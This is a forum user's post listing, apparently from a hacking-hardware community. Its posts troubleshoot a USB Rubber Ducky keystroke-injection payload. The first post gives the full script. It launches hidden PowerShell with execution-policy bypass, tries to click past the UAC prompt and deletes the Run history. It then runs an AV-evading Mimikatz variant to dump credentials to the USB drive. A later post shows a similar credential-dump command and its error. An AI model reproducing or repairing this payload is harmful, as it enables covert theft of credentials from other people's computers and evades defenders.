Jump to content

L07TB0Y

Active Members
  • Posts

    42
  • Joined

  • Last visited

Posts posted by L07TB0Y

  1. here is my code 

    DELAY 3000
    ESC
    DELAY 300
    GUI r
    DELAY 500
    ENTER
    STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=20&reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs"
    DELAY 1000
    ALT Y
    DELAY 1000
    LEFTARROW
    DELAY 300
    ENTER
    DELAY 500
    STRING for /f %d in ('wmic volume get driveletter^, label^|findstr "FILES"') do @set FILES=%d
    DELAY 300
    ENTER
    DELAY 1000
    STRING if exist %FILES%\lb.ps1 powershell -NoP -NonI -W Hidden -Exec Bypass "Import-Module %FILES%\lb.ps1;Invoke-Mimidogz -DumpCreds |Out-File '%FILES%\%computername%_creds.txt';"
    DELAY 300
    ENTER

     

     

    issue 1:

    THE UAC is not going away by either ALT Y or LEFTARROW and ENTER but even after this if i click OK manually it does not work 

    FILES is the name of rubber ducky 

    lb.ps1 is the customized mimi that does not get detected by AV etc 

    what am i doing wrong? 

  2. check out Darren and Snubs youtube channel that is a wealth of knowledge. In any case if you are lazy you can change the PIV/DIV of the ducky to make it look like an apple keyboard and apple will not ask you to setup the keyboard. 

    check out the wiki for the rest of your stuff

  3. well looks like win10 is now blocking scripts it could vie becuse i am running win 10 enterprise

     

    PS E:\> .\im.ps1 powershell -NoP -NonI -W Hidden -Exec Bypass "Import-Module %duck%\im.ps1;Invoke-Mimikatz -DumpCreds|Ou
    t-File '%duck%\%computername%_creds.txt';"
    .\im.ps1 : File E:\im.ps1 cannot be loaded because running scripts is disabled on this system. For more information,
    see about_Execution_Policies at http://go.microsoft.com/fwlink/?LinkID=135170.
    At line:1 char:1
    + .\im.ps1 powershell -NoP -NonI -W Hidden -Exec Bypass "Import-Module  ...
    + ~~~~~~~~
        + CategoryInfo          : SecurityError: (:) [], PSSecurityException
        + FullyQualifiedErrorId : UnauthorizedAccess 

  4. On 1/14/2017 at 3:08 PM, henna3 said:

    I have a quick little problem. The code and everything runs perfectly fine. My problem is that when the uac prompt comes up, it comes up as an non-active window. So, when alt+y is being pressed its not being pressed in the uac prompt window. Is there any way to fix this issue/workaround?

    Amazing twin duck payload!

    Thanks.

    did you find a solution? i am running into the same thing and well even if i choose to run the UAC i am not getting a file so 

×
×
  • Create New...